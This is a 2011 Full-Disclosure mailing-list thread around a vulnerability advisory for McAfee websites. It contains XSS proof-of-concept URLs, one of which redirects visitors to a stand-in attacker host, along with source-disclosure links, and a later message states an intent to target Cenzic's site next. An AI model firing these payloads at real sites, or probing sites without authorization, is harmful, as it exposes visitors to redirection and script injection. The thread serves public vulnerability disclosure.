? On Wed, Mar 30, 2011 at 1:49 PM, Benji <[email protected]> wrote:
> I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned > ethical hacking group YGN!!!111 > > > (Plzdontxssme) > > On 3/30/11, YGN Ethical Hacker Group <[email protected]> wrote: > > According to xssed.com, there are two remaining XSS issues: > > > > https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); // > > https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); // > > > > > > You guys know our disclosed issues are very simple and can easily be > > found through viewing HTML/JS source codes and simple Google Hacking > > ( > http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com). > > > > However, it was criticized as 'illegal break-in' by Cenzic's CMO, > > http://www.cenzic.com/company/management/khera/, according to Network > > World News editor - Ellen Messmer. Thus, the next target is Cenzic > > web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner > > is. > > > > > > --------------------------------- > > Best regards, > > YGN Ethical Hacker Group > > Yangon, Myanmar (Burma) > > http://yehg.net > > Our Lab | http://yehg.net/lab > > Our Directory | http://yehg.net/hwd > > > > > > > > > > On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes <[email protected]> wrote: > >> FIY > >> > >> > http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes > >> > >> > >> Pablo Ximenes > >> http://ximen.es/ > >> http://twitter.com/pabloximenes > >> > >> > >> > >> > >> 2011/3/28 Pablo Ximenes <[email protected]>: > >>> blog post about this: http://ximen.es/?p=469 > >>> > >>> Please, don't throw stones at me. > >>> > >>> []'s > >>> > >>> > >>> Pablo Ximenes > >>> http://ximen.es/ > >>> http://twitter.com/pabloximenes > >>> > >>> > >>> > >>> 2011/3/27 YGN Ethical Hacker Group <[email protected]> > >>>> > >>>> Vulnerabilities in *McAfee.com > >>>> > >>>> > >>>> 1. VULNERABILITY DESCRIPTION > >>>> > >>>> -> Cross Site Scripting > >>>> > >>>> > http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in > ') > >>>> > >>>> -> Information Disclosure > Internal Hostname: > >>>> http://www.mcafee.com/js/omniture/omniture_profile.js > >>>> > >>>> ($ ruby host-extract.rb -a > >>>> http://www.mcafee.com/js/omniture/omniture_profile.js) > >>>> > >>>> -> Information Disclosure > Source Code Disclosure: > >>>> > >>>> > >>>> view-source: > http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp > >>>> > >>>> view-source: > http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp > >>>> > >>>> view-source: > http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp > >>>> view-source: > http://download.mcafee.com/clinic/Includes/common.asp > >>>> > >>>> view-source:http://download.mcafee.com/updates/upgrade_patches.asp > >>>> > >>>> view-source:http://download.mcafee.com/updates/common/dat_common.asp > >>>> view-source:http://download.mcafee.com/updates/updates.asp > >>>> view-source:http://download.mcafee.com/updates/superDat.asp > >>>> view-source:http://download.mcafee.com/eval/evaluate2.asp > >>>> > >>>> view-source:http://download.mcafee.com/common/ssi/conditionals.asp > >>>> > >>>> view-source: > http://download.mcafee.com/common/ssi/errHandler_soft.asp > >>>> view-source: > http://download.mcafee.com/common/ssi/variables.asp > >>>> > >>>> view-source: > http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp > >>>> view-source: > http://download.mcafee.com/common/ssi/errHandler.asp > >>>> view-source: > http://download.mcafee.com/common/ssi/common_subs.asp > >>>> > >>>> view-source: > http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp > >>>> view-source:http://download.mcafee.com/us/bannerAd.asp > >>>> > >>>> view-source: > http://download.mcafee.com/common/ssi/standard/global_foot_us.asp > >>>> > >>>> > >>>> 2. RECOMMENDATION > >>>> > >>>> - Fully utilize Mcafee FoundStone Experts > >>>> - Use outbound monitoring of traffic to detect potential information > >>>> leakage > >>>> > >>>> > >>>> 3. VENDOR > >>>> > >>>> McAfee Inc > >>>> http://www.mcafee.com > >>>> > >>>> > >>>> 4. DISCLOSURE TIME-LINE > >>>> > >>>> 2011-02-10: reported vendor > >>>> 2011-02-12: vendor replied "we are working to resolve the issue as > >>>> quickly as possible" > >>>> 2011-03-27: vulnerability found to be unfixed completely > >>>> 2011-03-27: vulnerability disclosed > >>>> > >>>> > >>>> 5. REFERENCES > >>>> > >>>> Original Advisory URL: > >>>> > >>>> > http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak > >>>> Former Disclosure, 2008: > >>>> http://www.theregister.co.uk/2008/06/13/security_giants_xssed/ > >>>> Former Disclosure, 2009: > >>>> > >>>> > http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml > >>>> Former Disclosure, 2010: > >>>> > >>>> > http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html > >>>> host-extract: http://code.google.com/p/host-extract/ > >>>> Demo: > >>>> http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/ > >>>> xssed: http://www.xssed.com/search?key=mcafee.com > >>>> Lessont Learn: > >>>> > http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach > >>>> > >>>> #yehg [2011-03-27] > >>>> > >>>> _______________________________________________ > >>>> Full-Disclosure - We believe in it. > >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >>>> Hosted and sponsored by Secunia - http://secunia.com/ > >>> > >>> > >> > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
